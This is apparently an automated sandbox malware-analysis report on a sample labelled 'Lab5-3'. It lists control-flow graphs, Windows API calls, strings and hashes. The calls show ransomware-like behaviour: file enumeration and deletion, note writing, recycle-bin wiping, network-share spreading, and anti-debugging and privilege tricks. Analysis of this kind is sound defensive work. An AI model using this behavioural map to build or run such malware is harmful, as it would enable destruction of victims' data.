                                                                                                            • String ID: $ $ $$$$$$$%$%$-$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$8$A$I$J$M$M$M$M$N$R$T$W$W$\$\$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$b$b$b$b$b$b$b$c$c$c$c$c$c$c$c$c$c$c$d$d$d$d$d$d$d$d$d$e$e$e$e$e$e$e$e$e$e$e$e$e$e$f$f$f$g$g$g$g$g$h$h$h$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$k$k$k$l$l$l$l$l$l$l$l$l$l$l$l$l$l$m$m$m$m$m$m$n$n$n$n$n$n$n$n$n$n$n$n$n$n$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$p$p$p$p$p$p$p$p$r$r$r$r$r$r$r$r$r$r$r$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$t$t$t$t$t$t$t$t$t$t$t$t$u$u$u$u$u$w$w$w$w$w$x$x$x$y$y$z
                                                                                                            • API String ID: 3876518549-3246327213
                                                                                                            • Opcode ID: d0bf30d65a8ec9c1e754ca11533438cbfc3b2e3d6ec6be7310a69ef33bd158f9
                                                                                                            • Instruction ID: c9eea26188da315aa5ebd8ed11a5a99a12937e69108b06112e0ace7fca278374
                                                                                                            • Opcode Fuzzy Hash: d0bf30d65a8ec9c1e754ca11533438cbfc3b2e3d6ec6be7310a69ef33bd158f9
                                                                                                            • Instruction Fuzzy Hash: 10B2ECB5C0136ADADF20DF919C58BDEBAB9AF04744F0041D9960CA7211DBB99BC8CF64
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 114 419500-419949 PathFindExtensionW 115 419950-419959 114->115 116 419974-419979 115->116 117 41995b-419972 lstrcmpiW 115->117 118 419980-41999e CreateFileW 116->118 117->115 117->116 119 4199a0-4199a8 118->119 120 4199d9-419a66 GlobalAlloc wsprintfW NtSetInformationFile 118->120 121 419acb-419ad3 119->121 122 4199ae-4199bb call 417880 119->122 123 419ac4-419ac5 NtClose 120->123 124 419a68-419a79 GlobalAlloc 120->124 132 4199cd-4199d0 122->132 133 4199bd-4199bf call 4127a0 122->133 123->121 124->123 126 419a7b-419ab4 NtQueryInformationFile 124->126 128 419ad4-419af4 126->128 129 419ab6-419ac2 GlobalFree * 2 126->129 130 419af6 128->130 131 419afd-419b60 call 412920 * 2 ReadFile 128->131 129->123 130->129 134 419af8-419afb 130->134 142 419b91-419bac call 417f20 131->142 143 419b62-419b6d 131->143 132->121 137 4199d6-4199d7 132->137 139 4199c4-4199c7 133->139 134->129 134->131 137->118 139->121 139->132 147 419bc1-419bcc 142->147 148 419bae 142->148 143->142 144 419b6f-419b90 GlobalFree * 2 NtClose 143->144 149 419bb4-419bbf Sleep 148->149 149->147 149->149
                                                                                                            APIs
                                                                                                            • PathFindExtensionW.SHLWAPI(?,74DF3530,00000001,74DF3340), ref: 00419512
                                                                                                            • lstrcmpiW.KERNEL32(?,00000000,?,74DF3530,00000001,74DF3340), ref: 0041995D
                                                                                                            • CreateFileW.KERNEL32(?,C0010000,00000000,00000000,00000003,50000000,00000000,?,74DF3530,00000001,74DF3340), ref: 00419993
                                                                                                            • GlobalAlloc.KERNEL32(00000040,0000020A,?,74DF3530,00000001,74DF3340), ref: 004199EB
                                                                                                            • wsprintfW.USER32 ref: 00419A3C
                                                                                                            • NtSetInformationFile.NTDLL ref: 00419A5E
                                                                                                            • GlobalAlloc.KERNEL32(00000040,00040068,?,?,74DF3340), ref: 00419A6F
                                                                                                            • NtQueryInformationFile.NTDLL ref: 00419AAC
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00419ABD
                                                                                                            • GlobalFree.KERNEL32(?), ref: 00419AC2
                                                                                                            • NtClose.NTDLL ref: 00419AC5
                                                                                                            • ReadFile.KERNEL32(?,00000034,00000010,00000000,00000000,00040044,00000010,00040034,00000010,?,?,74DF3340), ref: 00419B52
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00419B76
                                                                                                            • GlobalFree.KERNEL32(?), ref: 00419B7B
                                                                                                            • NtClose.NTDLL ref: 00419B7E
                                                                                                              • Part of subcall function 00417F20: PathRemoveFileSpecW.SHLWAPI(?,?,00000000,00000000), ref: 00417F57
                                                                                                              • Part of subcall function 00417F20: wsprintfW.USER32 ref: 00417FBB
                                                                                                              • Part of subcall function 00417F20: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,50000000,00000000), ref: 00417FDD
                                                                                                              • Part of subcall function 00417F20: NtSetInformationFile.NTDLL ref: 00417FFF
                                                                                                              • Part of subcall function 00417F20: NtClose.NTDLL ref: 0041800A
                                                                                                              • Part of subcall function 00417F20: MessageBoxA.USER32(00000000,Unable to bind NOTE file IOCP %S error: %d,00000000,00000000), ref: 0041801B
                                                                                                            • Sleep.KERNEL32(00000003,?,?,74DF3340), ref: 00419BB6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001B.00000002.3749632182.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 0000001B.00000002.3748638629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3750630560.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3751597258.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_27_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: File$Global$Free$CloseInformation$AllocCreatePathwsprintf$ExtensionFindMessageQueryReadRemoveSleepSpeclstrcmpi
                                                                                                            • String ID: %$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$a$a$b$b$b$b$b$b$b$b$b$b$c$d$d$d$d$e$e$e$i$i$i$i$i$k$k$l$m$m$o$p$q$q$q$q$r$r$r$s$w$w$y$z
                                                                                                            • API String ID: 1477299043-472121766
                                                                                                            • Opcode ID: ddc5298d4db87c85eb57284e2f2b7c43d9c182ab714c5d8442adffb0c01f468c
                                                                                                            • Instruction ID: 3e4d32bfebab4aae2a6fd96daafcc9e24190bb3a7c50d78191816eb1e669ce2a
                                                                                                            • Opcode Fuzzy Hash: ddc5298d4db87c85eb57284e2f2b7c43d9c182ab714c5d8442adffb0c01f468c
                                                                                                            • Instruction Fuzzy Hash: 4802E2B4941368DAEB20CF61D888BDEBBB5FF08704F0041EAD549A7251D7B55AC8CF94
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 150 416e10-416e26 GetPEB 151 416e30-416e67 call 416990 RtlInitializeCriticalSection call 40fdb0 CreateThread 150->151 152 416e28-416e2a ExitProcess 150->152 157 416e72-416e84 Sleep call 41aa00 151->157 158 416e69-416e70 NtSetInformationThread 151->158 161 416e8a-416e99 call 412680 157->161 162 416f1d-416f24 call 412870 157->162 158->157 167 416e9b-416ea3 GetVersion 161->167 168 416efa-416f1a call 404090 call 4023c0 call 40f630 161->168 169 416f26-416f28 ExitProcess 162->169 170 416f2e-416f9d call 416b00 NtOpenProcess 162->170 167->168 173 416ea5-416ef4 GetPEB call 4124f0 call 412550 call 4124d0 call 41a8e0 call 41a740 ExitProcess 167->173 168->162 177 416fa3-416fa8 170->177 178 4170bd-4170c2 170->178 182 4170cb-4170d0 177->182 183 416fae-416fc7 GetSecurityInfo 177->183 181 4170c4-4170c5 NtClose 178->181 178->182 181->182 186 4170d2-4170d3 RtlFreeSid 182->186 187 4170d9-41711a NtSetInformationProcess RtlAdjustPrivilege GetCurrentProcess OpenProcessToken 182->187 183->178 188 416fcd-416fef RtlAllocateAndInitializeSid 183->188 186->187 191 41711c-41713a GetTokenInformation 187->191 192 41713e-417143 187->192 188->178 193 416ff5-417026 RtlQueryInformationAcl RtlLengthSid malloc 188->193 191->192 199 417145-417146 CloseHandle 192->199 200 41714c-417162 CreateThread 192->200 197 4170b7 193->197 198 41702c-417038 RtlCreateAcl 193->198 197->178 202 4170a7-4170b4 free 198->202 203 41703a-41704a RtlAddAccessDeniedAce 198->203 199->200 204 417164-41716b NtSetInformationThread 200->204 205 41716d-41716f 200->205 202->197 203->202 207 41704c-417051 203->207 204->205 208 417171-417189 CreateThread 205->208 209 417196 205->209 211 417093-4170a1 SetSecurityInfo 207->211 212 417053-417059 207->212 213 417199-4171a0 call 419330 208->213 214 41718b-417194 NtSetInformationThread 208->214 209->213 211->202 217 417060-417073 RtlGetAce 212->217 220 4171a2-4171c3 call 403fc0 call 403f40 call 40f630 ExitProcess 213->220 221 4171c9-4171d3 GetTickCount call 40fe80 213->221 214->213 217->202 219 417075-41708b RtlAddAce 217->219 219->202 222 41708d-417091 219->222 226 4171d8-417268 GetTickCount call 4020b0 call 40f630 call 401a90 call 401480 221->226 222->211 222->217 239 417279-41729e call 411e40 call 411a80 call 416b00 GetConsoleWindow IsWindowVisible 226->239 240 41726a-41726c 226->240 249 4172d1-4172e6 NtWaitForSingleObject call 416ce0 ExitProcess 239->249 250 4172a0-4172cc call 404010 call 403f80 call 40f630 call 412590 239->250 240->239 241 41726e 240->241 243 417270-417277 241->243 243->239 243->243 250->249
                                                                                                            APIs
                                                                                                            • ExitProcess.KERNEL32 ref: 00416E2A
                                                                                                            • RtlInitializeCriticalSection.NTDLL ref: 00416E3A
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,0040F800,00000000,00000000,?), ref: 00416E5C
                                                                                                            • NtSetInformationThread.NTDLL ref: 00416E70
                                                                                                            • Sleep.KERNEL32(000000C8), ref: 00416E77
                                                                                                            • GetVersion.KERNEL32 ref: 00416E9B
                                                                                                            • ExitProcess.KERNEL32 ref: 00416EF4
                                                                                                            Strings
                                                                                                            • Process created with limited rights, xrefs: 00416F03
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001B.00000002.3749632182.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 0000001B.00000002.3748638629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3750630560.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3751597258.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_27_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ExitProcessThread$CreateCriticalInformationInitializeSectionSleepVersion
                                                                                                            • String ID: Process created with limited rights
                                                                                                            • API String ID: 4206905793-1017407706
                                                                                                            • Opcode ID: dedcd555c503d301f003f574eaeea7dada5eac716081b6e6e10bb1baea7c705b
                                                                                                            • Instruction ID: 05cdbb695343fbdcc8a9ab5b6bfd7623162124a92b84b449242241f3d851d98d
                                                                                                            • Opcode Fuzzy Hash: dedcd555c503d301f003f574eaeea7dada5eac716081b6e6e10bb1baea7c705b
                                                                                                            • Instruction Fuzzy Hash: 51D1A771A40308ABEB209BA1CD49FEE7B78EF08714F144125F615F72E1DB789945CB58
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • RtlEnterCriticalSection.NTDLL(00426930), ref: 0041018B
                                                                                                            • lstrcmpiW.KERNEL32(?,?,?), ref: 004101AC
                                                                                                            • wsprintfW.USER32 ref: 004102AE
                                                                                                            • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,?,?), ref: 004102CB
                                                                                                            • RtlLeaveCriticalSection.NTDLL ref: 004102E2
                                                                                                            • ExitThread.KERNEL32 ref: 004102EA
                                                                                                            • FindClose.KERNEL32(00000000,?,?), ref: 004102F1
                                                                                                            • wsprintfW.USER32 ref: 00410393
                                                                                                            • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000001,04000100,00000000,?,?,?,?,?,?), ref: 004103B2
                                                                                                            • RtlLeaveCriticalSection.NTDLL ref: 004103D8
                                                                                                            • ExitThread.KERNEL32 ref: 004103E0
                                                                                                            • malloc.MSVCRT ref: 004103EB
                                                                                                            • RtlLeaveCriticalSection.NTDLL ref: 00410452
                                                                                                            • SHEmptyRecycleBinW.SHELL32(00000000,?,00000007), ref: 0041045D
                                                                                                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00410473
                                                                                                            • SetThreadUILanguage.KERNELBASE(00000409,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00410482
                                                                                                            • StrFormatByteSize64A.SHLWAPI(?,?,?,00000064), ref: 004104A0
                                                                                                            • StrFormatByteSize64A.SHLWAPI(?,?,?,00000064), ref: 004104B1
                                                                                                            • wsprintfA.USER32 ref: 004104DF
                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00410500
                                                                                                            • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041050E
                                                                                                            • ExitThread.KERNEL32 ref: 0041051D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001B.00000002.3749632182.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 0000001B.00000002.3748638629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3750630560.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3751597258.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_27_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSectionThread$ExitFileLeavewsprintf$ByteCloseFindFormatSize64$CreateDeleteDiskEmptyEnterFirstFreeHandleLanguageRecycleSpacelstrcmpimalloc
                                                                                                            • String ID: #$%S %s total / %s free$%s\%S$0$C$P
                                                                                                            • API String ID: 1890646748-3489668308
                                                                                                            • Opcode ID: ce81e58f3cdd69c70104042744d6c7f95c72f0754eadbb1952d4ba7479b3fcc6
                                                                                                            • Instruction ID: 90bbdc170fa110a38be7d5348af0c7c2766d943f18c39cc720d78da77a98dcfd
                                                                                                            • Opcode Fuzzy Hash: ce81e58f3cdd69c70104042744d6c7f95c72f0754eadbb1952d4ba7479b3fcc6
                                                                                                            • Instruction Fuzzy Hash: F7A1BD71518380ABC3209FA0DC44BAFBBF8EF89704F41592EF194D71A1E7789549CB9A
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 290 417880-417896 291 417898-4178d4 GetModuleHandleA 290->291 292 4178da-41794e call 401e40 GetProcAddress 290->292 291->292 295 417950-417961 292->295 295->295 296 417963-41797b GetProcAddress 295->296 297 417981-417983 296->297 298 417f05-417f16 296->298 297->298 299 417989-41799b 297->299 301 4179a1-417a9c GetProcAddress * 2 299->301 302 417ef6-417f04 299->302 303 417aa2-417aa4 301->303 304 417ee7 301->304 303->304 305 417aaa-417acb NtOpenFile 303->305 306 417eec-417ef2 304->306 305->306 307 417ad1-417aee 305->307 306->302 308 417af5-417b00 307->308 308->308 309 417b02-417b1a GetProcAddress 308->309 310 417b43-417b62 call 407e2d 309->310 311 417b1c-417b42 309->311 315 417b67-417b69 310->315 316 417b6b-417b7b call 407e2d 315->316 317 417b7e-417b9c 315->317 316->317 322 417ba2-417ba5 317->322 323 417ea6 317->323 322->323 324 417bab-417bfd call 402150 GetProcAddress 322->324 325 417ea9-417eb5 323->325 324->323 331 417c03-417d1b 324->331 327 417b64 325->327 328 417ebb-417ee6 325->328 327->315 332 417d20-417d34 malloc 331->332 334 417ea3 332->334 335 417d3a-417d50 NtQuerySystemInformation 332->335 334->323 336 417e75-417e85 free 335->336 337 417d56-417d5d 335->337 338 417e92-417e95 336->338 339 417e87-417e8d 336->339 340 417d60-417d69 337->340 338->334 341 417e97-417ea1 338->341 339->332 342 417d70-417d7e 340->342 341->325 343 417e50-417e56 342->343 344 417d84-417d8d 342->344 343->342 347 417e5c-417e63 343->347 345 417d8f-417d92 344->345 346 417d9e-417dae CharLowerBuffW 344->346 345->346 348 417d94-417d9c 345->348 349 417db1-417db4 346->349 347->340 350 417e69-417e6f 347->350 348->346 348->348 351 417dd3 349->351 352 417db6-417dbc 349->352 350->336 355 417dd5-417ddc 351->355 353 417dc0-417dd1 call 4041e0 352->353 354 417dbe 352->354 353->355 354->353 357 417e47-417e4d 355->357 358 417dde-417de5 355->358 357->343 358->349 360 417de7-417e0f 358->360 361 417e10-417e1b 360->361 361->361 362 417e1d-417e36 call 40f630 call 416710 361->362 366 417e3b-417e45 362->366 366->325
                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(?,00000000,00000000,?), ref: 004178CC
                                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 0041790E
                                                                                                            • GetProcAddress.KERNEL32(?), ref: 00417977
                                                                                                            • GetProcAddress.KERNEL32(?), ref: 00417A40
                                                                                                            • GetProcAddress.KERNEL32(?), ref: 00417A92
                                                                                                            • NtOpenFile.NTDLL(?,00000080,00000018,?,00000007,00000000), ref: 00417AC5
                                                                                                            • GetProcAddress.KERNEL32(?), ref: 00417B10
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00417BE8
                                                                                                            • malloc.MSVCRT ref: 00417D21
                                                                                                            • NtQuerySystemInformation.NTDLL(00000005,00000000,?,?,0000002F), ref: 00417D44
                                                                                                            • CharLowerBuffW.USER32(?,00000000), ref: 00417DA0
                                                                                                            • free.MSVCRT(00000000), ref: 00417E76
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001B.00000002.3749632182.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 0000001B.00000002.3748638629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3750630560.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3751597258.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_27_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$BuffCharFileHandleInformationLowerModuleOpenQuerySystemfreemalloc
                                                                                                            • String ID: !$3$H$Y/\'$[]FA$_$a}Fa$nhiA$nkb$ta`f
                                                                                                            • API String ID: 778601619-3596407591
                                                                                                            • Opcode ID: 928a1ced4edfe2a1eec1a4e71b32105cb383103265199e99b5322c2a32da379a
                                                                                                            • Instruction ID: aa8b998ef8105a80910c3bc4ad82b1a3a6713d45934d4583ce3d58dbc10d0851
                                                                                                            • Opcode Fuzzy Hash: 928a1ced4edfe2a1eec1a4e71b32105cb383103265199e99b5322c2a32da379a
                                                                                                            • Instruction Fuzzy Hash: AA128970E082699FDB21CFA8D8847EEBBB4AF19304F0440EAD548B7311DB745A85CFA5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • RtlInitializeCriticalSection.NTDLL ref: 0040FE8E
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,0041A450,00000000,00000000,?), ref: 0040FEAB
                                                                                                            • NtSetInformationThread.NTDLL ref: 0040FEC1
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,0040FAB0,00000000,00000000,?), ref: 0040FEE7
                                                                                                            • NtSetInformationThread.NTDLL ref: 0040FEF7
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,0040FA70,00000000,00000000,004171D8), ref: 0040FF1D
                                                                                                            • NtSetInformationThread.NTDLL ref: 0040FF2D
                                                                                                            • GetLogicalDrives.KERNEL32 ref: 0040FF42
                                                                                                            • GetDriveTypeW.KERNEL32(?), ref: 0040FF73
                                                                                                            • malloc.MSVCRT ref: 0040FF8E
                                                                                                            • wsprintfW.USER32 ref: 0041003F
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,t,00000000,00000000,?), ref: 00410058
                                                                                                            • NtSetInformationThread.NTDLL ref: 0041006C
                                                                                                            • Sleep.KERNEL32(00003A98), ref: 0041009D
                                                                                                            • WaitForMultipleObjects.KERNEL32(?,00426960,00000000,000000FF), ref: 004100AE
                                                                                                            • Sleep.KERNEL32(00000064), ref: 004100F2
                                                                                                            • RtlDeleteCriticalSection.NTDLL(00426930), ref: 0041010B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001B.00000002.3749632182.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 0000001B.00000002.3748638629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3750630560.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3751597258.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_27_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Thread$CreateInformation$CriticalSectionSleep$DeleteDriveDrivesInitializeLogicalMultipleObjectsTypeWaitmallocwsprintf
                                                                                                            • String ID: 333$o$t$threads closed, waiting handles...
                                                                                                            • API String ID: 1587691042-3484717054
                                                                                                            • Opcode ID: 6a527f495b3d53da47c74a9c080a530e9957821be9cf49b15fae1793c265c329
                                                                                                            • Instruction ID: bcec9fa377175a6d017f7fa74f539e6352aa7a71377bc0164c3aa970f20bdfce
                                                                                                            • Opcode Fuzzy Hash: 6a527f495b3d53da47c74a9c080a530e9957821be9cf49b15fae1793c265c329
                                                                                                            • Instruction Fuzzy Hash: EB81F474E40388ABDB209BA8EC45BDE7BB0AF0E710F554136F950B72E1D77414868B6D
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • AllocConsole.KERNEL32 ref: 0040F80C
                                                                                                            • GetConsoleWindow.KERNEL32 ref: 0040F812
                                                                                                            • ShowWindow.USER32(00000000,00000000), ref: 0040F823
                                                                                                            • SetConsoleTitleA.KERNEL32(?), ref: 0040F84B
                                                                                                            • SetConsoleCtrlHandler.KERNEL32(0040F980,00000001), ref: 0040F858
                                                                                                            • SetProcessShutdownParameters.KERNEL32(00000000,00000000), ref: 0040F862
                                                                                                            • GetWindowLongA.USER32(00000000,000000EC), ref: 0040F86B
                                                                                                            • SetWindowLongA.USER32(00000000,000000EC,00000000), ref: 0040F87A
                                                                                                            • SetLayeredWindowAttributes.USER32(00000000,00000000,000000BF,00000002), ref: 0040F88A
                                                                                                            • GetSystemMenu.USER32(00000000,00000000), ref: 0040F893
                                                                                                            • EnableMenuItem.USER32(00000000,0000F060,00000003), ref: 0040F8A7
                                                                                                            • DeleteMenu.USER32(00000000,0000F060,00000000), ref: 0040F8B5
                                                                                                            • GetConsoleMode.KERNEL32(?,?), ref: 0040F8CD
                                                                                                            • SetConsoleMode.KERNEL32(?,?), ref: 0040F8E6
                                                                                                            • RegisterHotKey.USER32(00000000,00000001,00000004,00000070), ref: 0040F8FA
                                                                                                            • RegisterHotKey.USER32(00000000,00000002,00000000,00000070), ref: 0040F904
                                                                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0040F911
                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0040F92E
                                                                                                            • ShowWindow.USER32(00000000,00000000), ref: 0040F94F
                                                                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0040F95C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001B.00000002.3749632182.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 0000001B.00000002.3748638629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3750630560.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3751597258.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_27_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ConsoleWindow$MenuMessage$LongModeRegisterShow$AllocAttributesCtrlDeleteEnableHandlerItemLayeredParametersPeekProcessShutdownSystemTitle
                                                                                                            • String ID:
                                                                                                            • API String ID: 565067356-0
                                                                                                            • Opcode ID: f7216761dd9bd50528ad4a5ed0497bc8d7a6f9c8c917b8079963824232b8244e
                                                                                                            • Instruction ID: 4619d5a12c184a103b5ff6e4c8133339cd7322335f187e554ae5444f3d7f3d92
                                                                                                            • Opcode Fuzzy Hash: f7216761dd9bd50528ad4a5ed0497bc8d7a6f9c8c917b8079963824232b8244e
                                                                                                            • Instruction Fuzzy Hash: 2841B731684304BBE7319B609C4AFAB7BA8EB49B10F104539F651FA1E0C7B4E945C79E
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 408 419d30-419d6a call 4124f0 411 419d7a-419e89 call 4124d0 wsprintfA GetModuleHandleA GetProcAddress 408->411 412 419d6c 408->412 416 419e90-419e98 411->416 413 419d70-419d78 412->413 413->411 413->413 417 419e9a-419e9d 416->417 418 419e9f-419eb4 GetModuleHandleA GetProcAddress 416->418 417->416 419 419f43-419f4e 418->419 420 419eba-419ebc 418->420 421 419f50-41a061 wsprintfW WNetAddConnection2W 419->421 420->419 422 419ec2-419ed1 420->422 423 41a067-41a08c NetShareEnum 421->423 422->419 430 419ed3-419ee1 gethostbyaddr 422->430 424 41a096-41a0a5 423->424 425 41a08e-41a094 423->425 428 41a0b5-41a0be NetApiBufferFree 424->428 429 41a0a7-41a0ab 424->429 425->424 427 41a0c0-41a0c3 425->427 431 41a0c5-41a0c9 427->431 432 41a0df-41a0ea 427->432 428->423 428->427 434 41a0eb-41a125 call 406bb0 call 401ce0 call 410170 429->434 435 41a0ad-41a0b3 429->435 430->419 433 419ee3-419f40 call 4124f0 call 401320 430->433 431->432 436 41a0cb-41a0d9 call 417790 431->436 433->419 435->428 435->429 436->421 436->432
                                                                                                            APIs
                                                                                                            • wsprintfA.USER32 ref: 00419DB6
                                                                                                            • GetModuleHandleA.KERNEL32(?,?), ref: 00419E59
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00419E62
                                                                                                            • GetModuleHandleA.KERNEL32(?,?), ref: 00419EAB
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00419EAE
                                                                                                            • gethostbyaddr.WS2_32(00000000,00000004,00000002), ref: 00419EDB
                                                                                                            • wsprintfW.USER32 ref: 0041A030
                                                                                                            • WNetAddConnection2W.MPR(?,00000000,00000000,00000000), ref: 0041A061
                                                                                                            • NetShareEnum.NETAPI32(?,00000001,?,000000FF,00000000,00000000,00000000), ref: 0041A082
                                                                                                            • NetApiBufferFree.NETAPI32(?), ref: 0041A0B6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001B.00000002.3749632182.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 0000001B.00000002.3748638629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3750630560.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3751597258.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_27_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressHandleModuleProcwsprintf$BufferConnection2EnumFreeSharegethostbyaddr
                                                                                                            • String ID: /HJ[G@\[MVNKK]$<$F$\\%S$\\%s\%s$`$u
                                                                                                            • API String ID: 2992407463-799303916
                                                                                                            • Opcode ID: 7b9e5076d4ee62915c553557ddd559a60d5718a0c2e8187b2e067960a58f0c0b
                                                                                                            • Instruction ID: 4add9407db59f9f686012b2b8cf93936b16fee97a91e8b4f02aa7f1e62e00a42
                                                                                                            • Opcode Fuzzy Hash: 7b9e5076d4ee62915c553557ddd559a60d5718a0c2e8187b2e067960a58f0c0b
                                                                                                            • Instruction Fuzzy Hash: 03C19E35C04288AECF11DFB4C854BDFBBF8AF1A304F04509AE454BB241D7795A4ACBA9
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

